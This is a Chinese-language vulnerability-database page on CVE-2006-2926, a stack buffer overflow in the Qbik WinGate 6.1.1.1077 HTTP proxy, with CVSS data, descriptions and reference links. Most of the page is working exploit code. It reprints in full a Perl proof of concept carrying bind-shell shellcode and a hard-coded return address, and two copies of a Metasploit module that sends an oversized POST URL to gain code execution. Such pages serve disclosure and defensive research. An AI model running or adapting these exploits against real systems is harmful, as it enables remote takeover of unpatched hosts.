CVE-2006-2926
CVSS7.5
发布时间 :2006-06-09 06:02:00
修订时间 :2011-03-07 21:37:18
NMCOEP    

[原文]Stack-based buffer overflow in the WWW Proxy Server of Qbik WinGate 6.1.1.1077 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long URL HTTP request.


[CNNVD]Qbik WinGate HTTP请求 缓冲区溢出漏洞(CNNVD-200606-204)

        WinGate是一款Internet共享/代理软件,可让局域网络同时共享一个Internet账号。
        Wingate的HTTP代理在处理特制的HTTP请求时存在缓冲区溢出漏洞。导致拒绝服务或执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2926
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2926
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-204
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/2182
(UNKNOWN)  VUPEN  ADV-2006-2182
http://secunia.com/advisories/20483
(VENDOR_ADVISORY)  SECUNIA  20483
http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046649.html
(UNKNOWN)  FULLDISC  20060607 MDaemon NOT vulnerable .. sorry for the advisory.. QBik Wingate is vulnerable
http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046646.html
(UNKNOWN)  FULLDISC  20060607 MDaemon NOT vulnerable .. sorry for the advisory.. QBik Wingate is vulnerable
http://xforce.iss.net/xforce/xfdb/26970
(UNKNOWN)  XF  wingate-http-proxy-bo(26970)
http://www.securityfocus.com/bid/18312
(UNKNOWN)  BID  18312
http://securitytracker.com/id?1016239
(UNKNOWN)  SECTRACK  1016239

- 漏洞信息

Qbik WinGate HTTP请求 缓冲区溢出漏洞
高危 缓冲区溢出
2006-06-09 00:00:00 2013-01-08 00:00:00
远程  
        WinGate是一款Internet共享/代理软件,可让局域网络同时共享一个Internet账号。
        Wingate的HTTP代理在处理特制的HTTP请求时存在缓冲区溢出漏洞。导致拒绝服务或执行任意代码。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://wingate.deerfield.com/

- 漏洞信息 (1885)

QBik Wingate 6.1.1.1077 (POST) Remote Buffer Overflow Exploit (EDBID:1885)
windows remote
2006-06-07 Verified
80 Kingcope
[点击下载] [点击下载]
### *** Proof of concept (not for "in the wild" kiddies) ***
### QBik Wingate version 6.1.1.1077 remote exploit for Win2k SP4 (german)
### by kcope in 2006
###
use IO::Socket;

if ($ARGV[0] eq "")
{
 print "param1 = remote host";
 exit;
}

# win32_bind -  EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e".
"\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58".
"\x4e\x46\x46\x32\x46\x52\x4b\x48\x45\x44\x4e\x33\x4b\x38\x4e\x47".
"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x58".
"\x4f\x35\x42\x32\x41\x30\x4b\x4e\x49\x44\x4b\x58\x46\x33\x4b\x48".
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c".
"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x55\x46\x52\x4a\x32\x45\x57\x45\x4e\x4b\x58".
"\x4f\x35\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x34".
"\x4b\x48\x4f\x45\x4e\x51\x41\x50\x4b\x4e\x43\x30\x4e\x52\x4b\x58".
"\x49\x48\x4e\x46\x46\x32\x4e\x31\x41\x36\x43\x4c\x41\x43\x4b\x4d".
"\x46\x56\x4b\x58\x43\x44\x42\x33\x4b\x58\x42\x34\x4e\x30\x4b\x48".
"\x42\x47\x4e\x31\x4d\x4a\x4b\x58\x42\x54\x4a\x30\x50\x35\x4a\x46".
"\x50\x38\x50\x34\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x46".
"\x43\x35\x48\x56\x4a\x46\x43\x53\x44\x53\x4a\x46\x47\x47\x43\x47".
"\x44\x33\x4f\x55\x46\x55\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e".
"\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x45\x49\x38\x45\x4e".
"\x48\x36\x41\x38\x4d\x4e\x4a\x50\x44\x30\x45\x55\x4c\x46\x44\x30".
"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45".
"\x4f\x4f\x48\x4d\x43\x55\x43\x35\x43\x35\x43\x55\x43\x35\x43\x44".
"\x43\x35\x43\x44\x43\x35\x4f\x4f\x42\x4d\x48\x56\x4a\x46\x41\x31".
"\x4e\x45\x48\x56\x43\x55\x49\x48\x41\x4e\x45\x59\x4a\x46\x46\x4a".
"\x4c\x41\x42\x37\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x56\x42\x51".
"\x41\x55\x45\x35\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x52".
"\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x55\x45\x45\x4f\x4f\x42\x4d".
"\x4a\x36\x45\x4e\x49\x54\x48\x48\x49\x54\x47\x35\x4f\x4f\x48\x4d".
"\x42\x35\x46\x35\x46\x55\x45\x55\x4f\x4f\x42\x4d\x43\x59\x4a\x46".
"\x47\x4e\x49\x57\x48\x4c\x49\x57\x47\x35\x4f\x4f\x48\x4d\x45\x45".
"\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x46\x48\x36\x4a\x56\x43\x46".
"\x4d\x46\x49\x38\x45\x4e\x4c\x56\x42\x55\x49\x35\x49\x52\x4e\x4c".
"\x49\x38\x47\x4e\x4c\x46\x46\x34\x49\x38\x44\x4e\x41\x43\x42\x4c".
"\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x42\x50\x4f\x44\x54\x4e\x32".
"\x43\x39\x4d\x58\x4c\x47\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46".
"\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x47\x46\x54\x4f\x4f".
"\x48\x4d\x4b\x45\x47\x45\x44\x55\x41\x55\x41\x35\x41\x35\x4c\x56".
"\x41\x30\x41\x55\x41\x55\x45\x55\x41\x55\x4f\x4f\x42\x4d\x4a\x56".
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x36".
"\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x58\x47\x45\x4e\x4f".
"\x43\x58\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d".
"\x4a\x56\x42\x4f\x4c\x48\x46\x30\x4f\x35\x43\x35\x4f\x4f\x48\x4d".
"\x4f\x4f\x42\x4d\x5a";

$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => '80',
                              Proto    => 'tcp');

$ret = "\x4b\x4f\x9e\x01";	# JMP ESI Win2k SP4 German
$x = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJ\xeb\x3dKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSAAAAUUUUVVVVWWWWXXXXYYYYZZZZ"
."AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJ\xeb\x3dKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSBBBBUUUUVVVVWWWWXXXXYYYYZZZZ"
."AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJ\xeb\x3dKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSS".$ret."UUUUVVVVWWWWXXXXYYYYZZZZ"
."AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJ\xeb\x3dKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSDDDDUUUUVVVVWWWWXXXXYYYYZZZZ"
."AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJ\xeb\x3dKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSEEEEUUUUVVVVWWWWXXXXYYYYZZZZ";
$a = "A" x 2000 . $x . "\x90" x 100 . $shellcode;
print $sock "POST http://$a/ HTTP/1.0\r\n\r\n";


while (<$sock>) {
	print;	
}

# milw0rm.com [2006-06-07]
		

- 漏洞信息 (16690)

Qbik WinGate WWW Proxy Server URL Processing Overflow (EDBID:16690)
windows remote
2010-09-20 Verified
80 metasploit
N/A [点击下载]
##
# $Id: qbik_wingate_wwwproxy.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Qbik WinGate WWW Proxy Server URL Processing Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Qbik WinGate version
				6.1.1.1077 and earlier. By sending malformed HTTP POST URL to the
				HTTP proxy service on port 80, a remote attacker could overflow
				a buffer and execute arbitrary code.
			},
			'Author'         => 'patrick',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					[ 'CVE', '2006-2926' ],
					[ 'OSVDB', '26214' ],
					[ 'BID', '18312' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 1000,
					'BadChars' => "\x00\x0a\x0d\x20+&=%\/\\\#;\"\':<>?",
					'EncoderType'   => Msf::Encoder::Type::AlphanumMixed,
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'WinGate 6.1.1.1077', { 'Ret' => 0x01991932 } ], # call esi
				],
			'Privileged'     => true,
			'DisclosureDate' => 'Jun 07 2006',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(80)
			], self.class)
	end

	def check
		connect
		sock.put("GET /\r\n\r\n") # Malformed request to get proxy info
		banner = sock.get_once
		if (banner =~ /Server:\sWinGate\s6.1.1\s\(Build 1077\)/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		buff = Rex::Text.rand_text_alphanumeric(3000)
		buff[1200, 1000] = payload.encoded # jmp here
		buff[2200, 5] = Rex::Arch::X86.jmp(-1005) # esi
		buff[2284, 4] = [target['Ret']].pack('V') #eip

		sploit  = "POST http://#{buff}/ HTTP/1.0\r\n\r\n"

		sock.put(sploit)
		sock.get_once(-1, 3)

		handler
		disconnect
	end

end
		

- 漏洞信息 (F86449)

Qbik WinGate WWW Proxy Server URL Processing Overflow (PacketStormID:F86449)
2010-02-19 00:00:00
patrick  metasploit.com
exploit,remote,web,overflow,arbitrary
CVE-2006-2926
[点击下载]

This Metasploit module exploits a stack overflow in Qbik WinGate version 6.1.1.1077 and earlier. By sending malformed HTTP POST URL to the HTTP proxy service on port 80, a remote attacker could overflow a buffer and execute arbitrary code.

##
# $Id: qbik_wingate_wwwproxy.rb 8547 2010-02-18 15:58:26Z patrickw $
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Qbik WinGate WWW Proxy Server URL Processing Overflow',
			'Description'    => %q{
		        This module exploits a stack overflow in Qbik WinGate version
			6.1.1.1077 and earlier. By sending malformed HTTP POST URL to the 
			HTTP proxy service on port 80, a remote attacker could overflow
			a buffer and execute arbitrary code.
			},
			'Author'         => 'patrick',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 8547 $',
			'References'     => 
				[ 
					[ 'CVE', '2006-2926' ],
					[ 'OSVDB', '26214' ],
					[ 'BID', '18312' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 1000,
					'BadChars' => "\x00\x0a\x0d\x20+&=%\/\\\#;\"\':<>?",
					'EncoderType'   => Msf::Encoder::Type::AlphanumMixed,
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'WinGate 6.1.1.1077', { 'Ret' => 0x01991932 } ], # call esi
				],
			'Privileged'     => true,
			'DisclosureDate' => 'Jun 07 2006',
			'DefaultTarget' => 0))

			register_options(
				[
					Opt::RPORT(80)
				], self.class)
	end

	def check
		connect
		sock.put("GET /\r\n\r\n") # Malformed request to get proxy info
		banner = sock.get_once
		if (banner =~ /Server:\sWinGate\s6.1.1\s\(Build 1077\)/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		buff = Rex::Text.rand_text_alphanumeric(3000)
		buff[1200, 1000] = payload.encoded # jmp here
		buff[2200, 5] = Rex::Arch::X86.jmp(-1005) # esi
		buff[2284, 4] = [target['Ret']].pack('V') #eip

		sploit  = "POST http://#{buff}/ HTTP/1.0\r\n\r\n"

		sock.put(sploit)
		sock.get_once(-1, 3)

		handler
		disconnect
	end

end
    

- 漏洞信息

26214
WinGate WWW Proxy Server URL Processing Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public, Exploit Commercial Uncoordinated Disclosure

- 漏洞描述

Wingate is prone to an overflow condition. The proxy server fails to properly sanitize user-supplied input resulting in a stack overflow. With a specially crafted long URL, a remote attacker can potentially cause arbitrary code execution.

- 时间线

2006-06-07 Unknow
2006-06-07 Unknow

- 解决方案

OSVDB is not aware of a solution for this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站